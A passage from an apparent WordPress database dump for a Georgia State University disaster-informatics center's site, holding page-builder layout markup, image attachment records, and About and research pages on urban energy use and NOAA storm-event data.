lumn-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%2240-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%2240-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%2240-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%2240-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%2240-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%2240-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%5Bcolibri_svg_icon%20name=icons8-line-awesome/arrow-right%5D%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n      </div>\n  </div>[colibri_layout_wrapper name=\"navigation_container\"]\n  <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n        <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n            <!---->\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n        <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n              <!---->\n              <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n        <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n              <!---->\n              <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n        <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n              <!---->\n              <div class=\"archive-nav-button h-global-transition-all\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>[/colibri_layout_wrapper]\n  <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n    <!---->\n    <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n      <!---->\n      <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n        <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <hop-archive-navigation previewid=\"40-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',40,'https://gsudice.dataconn.net/?p=89',0,'revision','',0),(90,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div disabled-ui=\"true\" data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n            <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-component=\"widget-area\" data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"sidebar-1\"]</div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',43,'https://gsudice.dataconn.net/?p=90',0,'revision','',0),(91,1,'2022-02-15 15:45:54','2022-02-15 15:45:54','<div disabled-ui=\"true\" data-colibri-id=\"46-s1\" class=\"style-176 style-local-46-s1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"46-s2\" id=\"product-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-177 style-local-46-s2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"46-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-182 style-local-46-s3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-183-outer style-local-46-s4-outer\">\n            <div data-colibri-id=\"46-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-183 style-local-46-s4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-component=\"widget-area\" data-colibri-id=\"46-s5\" class=\"h-widget-area style-184 style-local-46-s5 position-relative h-element\">\n                  <!---->\n                  <div class=\"widget-shortcode h-global-transition-all\">[colibri_widget_area id=\"ecommerce-left\"]</div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                  <div data-aos-selector=\".widget\" data-colibri-id=\"46-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','sidebar_product','','inherit','closed','closed','','46-revision-v1','','','2022-02-15 15:45:54','2022-02-15 15:45:54','',46,'https://gsudice.dataconn.net/?p=91',0,'revision','',0),(93,1,'2022-02-15 15:48:54','2022-02-15 15:48:54','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-header-scaled-1.jpg','cropped-header-scaled-1.jpg','','inherit','open','closed','','cropped-header-scaled-1-jpg','','','2022-02-15 15:48:54','2022-02-15 15:48:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-header-scaled-1.jpg',0,'attachment','image/jpeg',0),(94,1,'2022-02-15 15:50:06','2022-02-15 15:50:06','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png','cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png','','inherit','open','closed','','cropped-dice-log-6-sides-largbox_text-e1644937921882-png','','','2022-02-15 15:50:06','2022-02-15 15:50:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-DICE-log-6-sides-Largbox_text-e1644937921882.png',0,'attachment','image/png',0),(95,1,'2022-02-15 15:50:10','2022-02-15 15:50:10','','colibri-image-299.png','','inherit','open','closed','','colibri-image-299-png','','','2022-02-15 15:50:10','2022-02-15 15:50:10','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-299.png',0,'attachment','image/png',0),(96,1,'2022-02-15 15:50:11','2022-02-15 15:50:11','','colibri-image-298.png','','inherit','open','closed','','colibri-image-298-png','','','2022-02-15 15:50:11','2022-02-15 15:50:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-298.png',0,'attachment','image/png',0),(103,1,'2022-02-15 15:56:55','2022-02-15 15:56:55','','marc-szeglat-BsAzhHIIwxg-unsplash','','inherit','open','closed','','marc-szeglat-bsazhhiiwxg-unsplash','','','2022-02-15 15:56:55','2022-02-15 15:56:55','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/marc-szeglat-BsAzhHIIwxg-unsplash.jpg',0,'attachment','image/jpeg',0),(104,1,'2022-02-15 15:57:06','2022-02-15 15:57:06','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg','cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-marc-szeglat-bsazhhiiwxg-unsplash-scaled-1-jpg','','','2022-02-15 15:57:06','2022-02-15 15:57:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(122,1,'2022-02-15 16:17:51','2022-02-15 16:17:51','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','publish','closed','closed','','about','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',0,'https://gsudice.dataconn.net/?page_id=122',0,'page','',0),(123,1,'2022-02-15 16:17:35','2022-02-15 16:17:35','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-colibri-wp','','','2022-02-15 16:17:35','2022-02-15 16:17:35','',0,'https://gsudice.dataconn.net/2022/02/15/wp-global-styles-colibri-wp/',0,'wp_global_styles','',0),(124,1,'2022-02-15 16:17:51','2022-02-15 16:17:51','','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 16:17:51','2022-02-15 16:17:51','',122,'https://gsudice.dataconn.net/?p=124',0,'revision','',0),(125,1,'2022-02-15 16:18:11','2022-02-15 16:18:11','','About Us','','inherit','closed','closed','','122-revision-v1','','','2022-02-15 16:18:11','2022-02-15 16:18:11','',122,'https://gsudice.dataconn.net/?p=125',0,'revision','',0),(126,1,'2022-02-15 16:18:43','2022-02-15 16:18:43','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If 